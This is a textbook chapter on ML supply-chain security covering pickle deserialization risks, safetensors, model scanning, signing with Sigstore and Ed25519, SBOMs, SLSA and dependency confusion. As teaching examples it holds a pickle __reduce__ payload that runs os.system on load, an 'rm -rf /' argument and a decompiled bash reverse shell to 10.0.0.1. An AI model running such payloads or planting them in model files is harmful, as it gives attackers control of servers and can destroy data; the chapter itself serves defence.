Chapter 31.4: DevSecOps & Supply Chain Security
“An ML model is just a binary blob that executes matrix multiplication. Or so we thought, until someone put a reverse shell in the weights file.”
31.4.1. The Model Supply Chain Crisis
In modern MLOps, we rarely train from scratch. We download bert-base from Hugging Face, resnet from TorchVision, and docker images from Docker Hub.
This is a Supply Chain. And it is currently wide open.
The Attack Surface
- Direct Dependency: The `pip install tensorflow` package.
- Model Dependency: The `model.pth` file.
- Data Dependency: The S3 bucket with training JPEGs.
- Container Dependency: The `FROM python:3.9` base image.
31.4.2. The Pickle Vulnerability (Arbitrary Code Execution)
Python’s pickle module is the standard serialization format for PyTorch (torch.save), Scikit-Learn (joblib), and Pandas.
It is insecure by design.
How Pickle Works
Pickle is a stack-based virtual machine with its own opcodes. One of those opcodes, REDUCE, calls an arbitrary callable with attacker-chosen arguments.
- Normal: `REDUCE(torch.Tensor, [1,2,3])` -> Creates a tensor.
- Evil: `REDUCE(os.system, ["rm -rf /"])` -> Deletes your server.
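To make the threat concrete, here is a minimal, harmless sketch of the technique; the `Exploit` class and `echo pwned` payload are illustrative stand-ins for a real payload:

```python
import os
import pickle

class Exploit:
    # pickle calls __reduce__ to learn how to rebuild an object.
    # Returning (os.system, ("...",)) makes *unpickling* run the command.
    def __reduce__(self):
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)  # prints "pwned": code executed at load time
```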
The Exploit
Hugging Face hosts >500k models. Anyone can upload a .bin or .pth file.
If you load a model from a stranger:
```python
import torch

model = torch.load("downloaded_model.pth")  # BOOM! Hacker owns your shell.
```
This happens instantly upon load. You don’t even need to run inference.
The Solution: Safetensors
Safetensors (developed by Hugging Face) is a format designed to be safe, fast, and zero-copy.
- Safe: It purely stores tensors and JSON metadata. No executable code.
- Fast: Uses memory mapping (`mmap`) for instant loading.
Rule: Block all `.pkl`, `.pth`, and `.bin` files from untrusted sources. Only allow `.safetensors` or ONNX.
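A round-trip sketch using the `safetensors.torch` API:

```python
import torch
from safetensors.torch import save_file, load_file

# Saving writes only raw tensor bytes plus a JSON header -- no code paths.
save_file({"weight": torch.randn(2, 2)}, "model.safetensors")

# Loading is mmap-backed and cannot trigger arbitrary code execution.
tensors = load_file("model.safetensors")
```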
31.4.3. Scanning your Supply Chain
Just as we scan code for bugs, we must scan models and datasets for threats.
1. ModelScan
A tool to scan model files (PyTorch, TensorFlow, Keras, Sklearn) for known unsafe operators.
```bash
pip install modelscan

# Scan a directory
modelscan -p ./downloaded_models

# Output:
# CRITICAL: Found unsafe operator 'os.system' in model.pkl
```
2. Gitleaks (Secrets in Notebooks)
Data Scientists love Jupyter Notebooks. They also love hardcoding AWS keys in them.
- Problem: Notebooks are JSON. Plaintext scanners often miss secrets inside the `"source": []` blocks.
- Solution: Use `nbconvert` to strip output before committing, and run `gitleaks` in CI; a programmatic stripping sketch follows this list.
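Stripping can also be done programmatically with the `nbformat` library instead of the `nbconvert` CLI; a minimal sketch (the notebook filename is illustrative):

```python
import nbformat

# Strip all outputs so committed notebooks contain only source cells,
# which is what gitleaks actually needs to scan.
nb = nbformat.read("analysis.ipynb", as_version=4)
for cell in nb.cells:
    if cell.cell_type == "code":
        cell.outputs = []
        cell.execution_count = None
nbformat.write(nb, "analysis.ipynb")
```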
3. CVE Scanning (Trivy)
ML Docker images are huge (5GB+) and full of vulnerabilities (old CUDA drivers, system libs).
```bash
trivy image pytorch/pytorch:2.0.1-cuda11.7-cudnn8-runtime

# Output: 500 Vulnerabilities (20 Critical).
```
Mitigation: Use Distroless images or “Wolfi” (Chainguard) images for ML containers to reduce surface area.
31.4.4. SBOM for AI (Software Bill of Materials)
An SBOM is a list of ingredients. For AI, we need an AI-SBOM (or MLBOM).
The CycloneDX Standard
CycloneDX v1.5 added support for ML Models. It tracks:
- Model Metadata: Name, version, author.
- Dataset Ref: Hash of the training set.
- Hyperparameters: Learning rate, epochs.
- Hardware: “Trained on H100”.
Generating an SBOM
Tools like syft can generate SBOMs for containers/directories.
```bash
syft dir:. -o cyclonedx-json > sbom.json
```
Why it matters
When the next “Log4Shell”-style vulnerability hits a specific version of numpy or transformers, you can query your SBOM database: “Show me every model in production that was trained using `numpy==1.20`.”
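That query can be a few lines of stdlib Python; a minimal sketch, assuming you archive one CycloneDX JSON file per model under a hypothetical `sboms/` directory:

```python
import json
import pathlib

VULNERABLE = ("numpy", "1.20")  # package/version hit by the new CVE

# Walk every stored SBOM and flag models whose environment contained it.
for sbom_path in pathlib.Path("sboms").glob("*.json"):
    sbom = json.loads(sbom_path.read_text())
    for component in sbom.get("components", []):
        if (component["name"], component["version"]) == VULNERABLE:
            print(f"AFFECTED: {sbom_path.stem}")
```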
31.4.5. Model Signing (Sigstore)
How do you know model.safetensors was actually produced by your CI/CD pipeline and not swapped by a hacker?
Signing.
Sigstore / Cosign
Sigstore allows “Keyless Signing” using OIDC identity (e.g., GitHub Actions identity).
Signing (in CI):
```bash
# Authenticate via OIDC
cosign sign-blob --oidc-issuer https://token.actions.githubusercontent.com \
  ./model.safetensors
```
Verifying (in Inference Server):
```bash
cosign verify-blob \
  --certificate-identity "https://github.com/myorg/repo/.github/workflows/train.yml" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ./model.safetensors
```
If the signature doesn’t match, the model server refuses to load.
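One way to enforce that is a small gate in the model server that shells out to cosign before deserializing anything. A sketch, assuming the signature and certificate were stored next to the model as `.sig` and `.crt` files (the `load_verified` helper is illustrative):

```python
import subprocess
from safetensors.torch import load_file

def load_verified(path: str, identity: str, issuer: str):
    # Refuse to deserialize anything whose signature fails verification.
    result = subprocess.run(
        ["cosign", "verify-blob",
         "--certificate-identity", identity,
         "--certificate-oidc-issuer", issuer,
         "--signature", f"{path}.sig",
         "--certificate", f"{path}.crt",
         path],
        capture_output=True,
    )
    if result.returncode != 0:
        raise RuntimeError(f"refusing to load {path}: invalid signature")
    return load_file(path)
```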
31.4.6. Confidential Computing (AWS Nitro Enclaves)
For high-security use cases (Healthcare, Finance), you must also protect data in use (in RAM). Normally, the cloud provider (AWS/GCP) technically has root access to the hypervisor and could dump your RAM.
Confidential Computing encrypts the RAM. The CPU holds the keys (via technologies like AMD SEV or Intel SGX). Even AWS cannot see the memory.
Architecture: Nitro Enclaves
- Parent Instance: Standard EC2. Runs the web server.
- Enclave: A hardened, isolated VM with NO network, NO storage, and NO ssh. It only talks to the Parent via a local socket (VSOCK).
- Attestation: The Enclave proves to the client (via cryptographic proof signed by AWS KMS) that it is running the exact code expected.
Use Case: Private Inference
- User: Sends encrypted genome data.
- Enclave: Decrypts data inside the enclave, runs model inference, encrypts prediction.
- Result: The Admin of the EC2 instance never sees the genome data.
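A minimal sketch of the enclave side of that VSOCK channel (Linux-only; the port number is an arbitrary example, and the crypto steps are elided):

```python
import socket

ENCLAVE_PORT = 5005  # arbitrary example port

# The enclave has no NIC: AF_VSOCK is its only channel to the parent.
sock = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
sock.bind((socket.VMADDR_CID_ANY, ENCLAVE_PORT))
sock.listen(1)
conn, _ = sock.accept()
ciphertext = conn.recv(65536)
# ... decrypt (key released by KMS only after attestation),
# run inference, encrypt the prediction, then reply:
conn.sendall(b"<encrypted prediction>")
```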
31.4.7. Zero Trust ML Architecture
Combining it all into a holistic “Zero Trust” strategy.
- Identity: Every model, service, and user has an SPIFFE ID. No IP-based allowlists.
- Least Privilege: The Training Job has write access to `s3://weights`, but read-only to `s3://data`. The Inference Service has read-only access to `s3://weights`.
- Validation (an input-check sketch follows this list):
  - Input: Validate shapes, types, and value ranges.
  - Model: Validate Signatures (Sigstore) and Scan Status (ModelScan).
  - Output: Validate PII and Confidence (Uncertainty Estimation).
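The Input leg of that validation is often just a few strict checks. A minimal sketch, assuming a [0, 1]-normalized batch of one 224x224 RGB image:

```python
import numpy as np

def validate_input(x: np.ndarray) -> np.ndarray:
    # Shape, dtype, and range checks before the tensor reaches the model.
    if x.shape != (1, 3, 224, 224):  # example image batch shape
        raise ValueError(f"unexpected shape {x.shape}")
    if x.dtype != np.float32:
        raise TypeError(f"unexpected dtype {x.dtype}")
    if not np.isfinite(x).all() or x.min() < 0.0 or x.max() > 1.0:
        raise ValueError("values outside expected [0, 1] range")
    return x
```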
31.4.9. Deep Dive: Supply-chain Levels for Software Artifacts (SLSA)
Google’s SLSA (pronounced “salsa”) framework is the gold standard for supply chain integrity. We adapt it for ML.
SLSA Levels for ML
- Level 1 (Scripted Build): You have a `train.py` script. You aren’t just manually running commands in a notebook.
- Level 2 (Version Control): The code and config are in Git. The build runs in a CI system (GitHub Actions).
- Level 3 (Verified History): The CI system produces a signed provenance attestation: “I, GitHub Actions run #55, produced this `model.safetensors`.”
- Level 4 (Two-Person Review + Hermetic): All code changes reviewed. Builds are hermetic (no internet access during training, to prevent downloading unpinned deps).
Implementing SLSA Level 3
Use the slsa-github-generator action.
```yaml
uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v1.4.0
with:
  base64-subjects: "${{ hash_of_model }}"
  upload-assets: true
```
31.4.10. Air-Gapped & Private Deployments
For Banks and Defense, “Security” means “No Internet.”
The Pattern: VPC Endpoints
You never want your inference server to have 0.0.0.0/0 outbound access.
- Problem: How do you download the model from S3 or talk to Bedrock?
- Solution: AWS PrivateLink (VPC Endpoints), sketched below.
  - Creates a local network interface (ENI) in your subnet that routes to S3/Bedrock internally on the AWS backbone.
  - No NAT Gateway required. No Internet Gateway required.
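A sketch of creating the S3 endpoint with boto3 (the VPC and route-table IDs are placeholders; S3 uses the Gateway endpoint type):

```python
import boto3

# Keep S3 traffic on the AWS backbone: no NAT Gateway, no Internet Gateway.
ec2 = boto3.client("ec2", region_name="us-east-1")
ec2.create_vpc_endpoint(
    VpcId="vpc-0123456789abcdef0",            # placeholder
    ServiceName="com.amazonaws.us-east-1.s3",
    VpcEndpointType="Gateway",
    RouteTableIds=["rtb-0123456789abcdef0"],  # placeholder
)
```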
PyPI Mirroring
You cannot run pip install tensorflow in an air-gapped environment.
- Solution: Run a private PyPI mirror (Artifactory / AWS CodeArtifact).
- Process: Security team scans packages -> Pushes to Private PyPI -> Training jobs pull from Private PyPI.
31.4.11. Tool Spotlight: Fickling
We mentioned modelscan. Fickling is a more aggressive tool that can reverse-engineer Pickle files to find the injected code.
Decompiling a Pickle
Pickle is a stack-based language. Fickling decompiles it into human-readable Python code.
```bash
fickling --decompile potentially_evil_model.pth

# Output:
# import os
# os.system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')
```
This serves as forensic evidence during an incident response.
31.4.12. Zero Trust Data Access
Security isn’t just about the code; it’s about the Data.
OPA (Open Policy Agent) for Data
Use OPA to enforce matching between User Clearance and Data Classification.
```rego
package data_access

default allow = false

# Allow if user clearance level >= data sensitivity level
allow {
    user_clearance := input.user.attributes.clearance_level
    data_sensitivity := input.data.classification.level
    user_clearance >= data_sensitivity
}
```
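To see the policy in action, a sketch that queries a local OPA sidecar over its standard REST API (the clearance/sensitivity values are illustrative):

```python
import requests

# Query OPA's data API (default sidecar port 8181). The input document
# mirrors the attributes referenced in the policy above.
decision = requests.post(
    "http://localhost:8181/v1/data/data_access/allow",
    json={"input": {
        "user": {"attributes": {"clearance_level": 3}},
        "data": {"classification": {"level": 2}},
    }},
).json()
assert decision.get("result") is True  # clearance 3 >= sensitivity 2
```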
Purpose-Based Access Control
“Why does this model need this data?”
- Training: Needs bulk access.
- Inference: Needs single-record access.
- Analyst: Needs aggregated/anonymized access.
31.4.14. Deep Dive: Model Cards for Security
Security is about Transparency. A Model Card (Mitchell et al.) documents the safety boundaries of the model.
Key Security Sections
- Intended Use: “This model is for poetic generation. NOT for medical advice.”
- Out-of-Scope Use: “Do not use for credit scoring.”
- Training Data: “Trained on Public Crawl 2023 (Potential Toxicity).”
- Limitations: “Hallucinates facts about events post-2022.”
Automating Model Cards
Use the huggingface_hub Python library to programmatically generate cards in CI.
```python
from huggingface_hub import ModelCard, ModelCardData

card_data = ModelCardData(
    language='en',
    license='mit',
    model_name='fin-bert-v2',
    finetuned_from='bert-base-uncased',
    tags=['security-audited', 'slsa-level-3']
)

card = ModelCard.from_template(
    card_data,
    template_path="security_template.md"
)
card.save('README.md')
```
31.4.15. Private Model Registries (Harbor / Artifactory)
Don’t let your servers pull from huggingface.co directly.
- Risk: Hugging Face could go down, or the model author could delete/update the file (Mutable tags).
- Solution: Proxy everything through an OCI-compliant registry.
Architecture
- Curator: Security Engineer approves `bert-base`.
- Proxy: `dronerepo.corp.com` caches `bert-base`.
- Training Job: `FROM dronerepo.corp.com/bert-base`.
Harbor Config (OCI)
Harbor v2.0+ supports OCI artifacts. You can push models as Docker layers.
# Push Model to OCI Registry
oras push myregistry.com/models/bert:v1 \
--artifact-type application/vnd.model.package \
./model.safetensors
This treats the model exactly like a Docker image (immutable, signed, scanned).
31.4.16. War Story: The PyTorch Dependency Confusion
“We installed `pytorch-helpers` and got hacked.”
The Attack
- Concept: Dependency Confusion (Alex Birsan).
- Setup: Company X uses an internal package called `pytorch-helpers`, hosted on their private PyPI.
- Attack: Hacker registers `pytorch-helpers` on the public PyPI with a massive version number (v99.9.9).
- Execution: When `pip install pytorch-helpers` runs in CI, pip (by default) looks at both public and private repos and picks the highest version. It downloaded the hacker’s v99 package.
Not just Python
This attack hits npm, RubyGems, and NuGet too.
The Fix
- Namespace Scoping: Use scoped packages (`@company/helpers`).
- Strict Indexing: Configure pip to consult only the private repo for internal names. `--extra-index-url` is dangerous; use with caution. A sketch of a strict `pip.conf` follows.
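A minimal sketch of a strict `pip.conf`, assuming a hypothetical internal mirror at `pypi.corp.com` that proxies approved public packages:

```ini
# /etc/pip.conf -- route ALL installs through the curated internal index.
# Never add extra-index-url here: pip would race it against the public PyPI.
[global]
index-url = https://pypi.corp.com/simple/
```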
31.4.17. Interview Questions
Q1: What is a “Hermetic Build” in MLOps?
- Answer: A build process where the network is disabled (except for a specific, verified list of inputs). It guarantees that if I run the build today and next year, I get bit-for-bit identical results. A standard `pip install` is NOT hermetic because deps change.
Q2: Why is Model Signing separate from Container Signing?
- Answer: Containers change rarely (monthly). Models change frequently (daily/hourly). Signing them separately allows you to re-train the model without rebuilding the heavy CUDA container.
31.4.19. Appendix: Production Model Signing Tool (Python)
Below is a complete implementation of a CLI tool to Sign and Verify machine learning models using Asymmetric Cryptography (Ed25519). This is the foundation of a Level 3 SLSA build.
```python
import argparse
import hashlib
import sys

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519


class ModelSigner:
    def generate_keys(self, base_path: str):
        """Generates an Ed25519 private/public keypair."""
        private_key = ed25519.Ed25519PrivateKey.generate()
        public_key = private_key.public_key()

        # Save Private Key (In production, this stays in Vault/KMS)
        with open(f"{base_path}.priv.pem", "wb") as f:
            f.write(private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.PKCS8,
                encryption_algorithm=serialization.NoEncryption()
            ))

        # Save Public Key
        with open(f"{base_path}.pub.pem", "wb") as f:
            f.write(public_key.public_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PublicFormat.SubjectPublicKeyInfo
            ))
        print(f"Keys generated at {base_path}.priv.pem and {base_path}.pub.pem")

    def sign_model(self, model_path: str, key_path: str):
        """Signs the SHA256 hash of a model file."""
        # 1. Load Key
        with open(key_path, "rb") as f:
            private_key = serialization.load_pem_private_key(
                f.read(), password=None
            )

        # 2. Hash Model (streaming, so multi-GB files don't blow up RAM)
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            while chunk := f.read(8192):
                sha256.update(chunk)
        digest = sha256.digest()

        # 3. Sign
        signature = private_key.sign(digest)

        # 4. Save Signature
        sig_path = f"{model_path}.sig"
        with open(sig_path, "wb") as f:
            f.write(signature)
        print(f"Model signed. Signature at {sig_path}")

    def verify_model(self, model_path: str, key_path: str, sig_path: str):
        """Verifies integrity and authenticity."""
        # 1. Load Key
        with open(key_path, "rb") as f:
            public_key = serialization.load_pem_public_key(f.read())

        # 2. Load Signature
        with open(sig_path, "rb") as f:
            signature = f.read()

        # 3. Hash Model
        sha256 = hashlib.sha256()
        try:
            with open(model_path, "rb") as f:
                while chunk := f.read(8192):
                    sha256.update(chunk)
            digest = sha256.digest()
        except FileNotFoundError:
            print("Model file not found.")
            sys.exit(1)

        # 4. Verify (raises InvalidSignature on tampered files)
        try:
            public_key.verify(signature, digest)
            print("SUCCESS: Model signature is VALID. The file is authentic.")
        except InvalidSignature:
            print("CRITICAL: Model signature is INVALID! Do not load this file.")
            sys.exit(1)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ML Model Signing Tool")
    subparsers = parser.add_subparsers(dest="command")

    gen = subparsers.add_parser("keygen", help="Generate keys")
    gen.add_argument("--name", required=True)

    sign = subparsers.add_parser("sign", help="Sign a model")
    sign.add_argument("--model", required=True)
    sign.add_argument("--key", required=True)

    verify = subparsers.add_parser("verify", help="Verify a model")
    verify.add_argument("--model", required=True)
    verify.add_argument("--key", required=True)
    verify.add_argument("--sig", required=True)

    args = parser.parse_args()
    signer = ModelSigner()
    if args.command == "keygen":
        signer.generate_keys(args.name)
    elif args.command == "sign":
        signer.sign_model(args.model, args.key)
    elif args.command == "verify":
        signer.verify_model(args.model, args.key, args.sig)
```
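Usage, assuming the script above is saved as `model_signer.py`: run `python model_signer.py keygen --name ci` once in the pipeline’s trusted context, `python model_signer.py sign --model model.safetensors --key ci.priv.pem` after training, and `python model_signer.py verify --model model.safetensors --key ci.pub.pem --sig model.safetensors.sig` in the inference server before loading.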
31.4.20. Appendix: Simple SBOM Generator
A script to generate a CycloneDX-style JSON inventory of the current Python environment.
```python
import datetime
import json
import socket
import uuid

import pkg_resources


def generate_sbom():
    installed_packages = pkg_resources.working_set
    sbom = {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "serialNumber": f"urn:uuid:{uuid.uuid4()}",
        "version": 1,
        "metadata": {
            "timestamp": datetime.datetime.utcnow().isoformat(),
            "tool": {
                "vendor": "MLOps Book",
                "name": "SimpleSBOM",
                "version": "1.0.0"
            },
            "component": {
                "type": "container",
                "name": socket.gethostname()
            }
        },
        "components": []
    }

    # One CycloneDX component per installed package, identified by its purl.
    for package in installed_packages:
        component = {
            "type": "library",
            "name": package.project_name,
            "version": package.version,
            "purl": f"pkg:pypi/{package.project_name}@{package.version}",
            "description": "Python Package"
        }
        sbom["components"].append(component)
    return sbom


if __name__ == "__main__":
    print(json.dumps(generate_sbom(), indent=2))
```
31.4.21. Summary
DevSecOps is about shifting security left.
- Don’t Pickle: Use Safetensors.
- Scan Everything: Scan models and containers in CI.
- Sign Artifacts: Use Sigstore to guarantee provenance.
- Isolate: Run high-risk parsing (like PDF parsing) in sandboxes/enclaves.
- Inventory: Maintain an SBOM so you know what you are running.
- Air-Gap: If it doesn’t need the internet, cut the cable.
- Private Registry: Treating models as OCI artifacts is the future of distribution.
- Tooling: Use the provided `ModelSigner` to implement signing and verification today.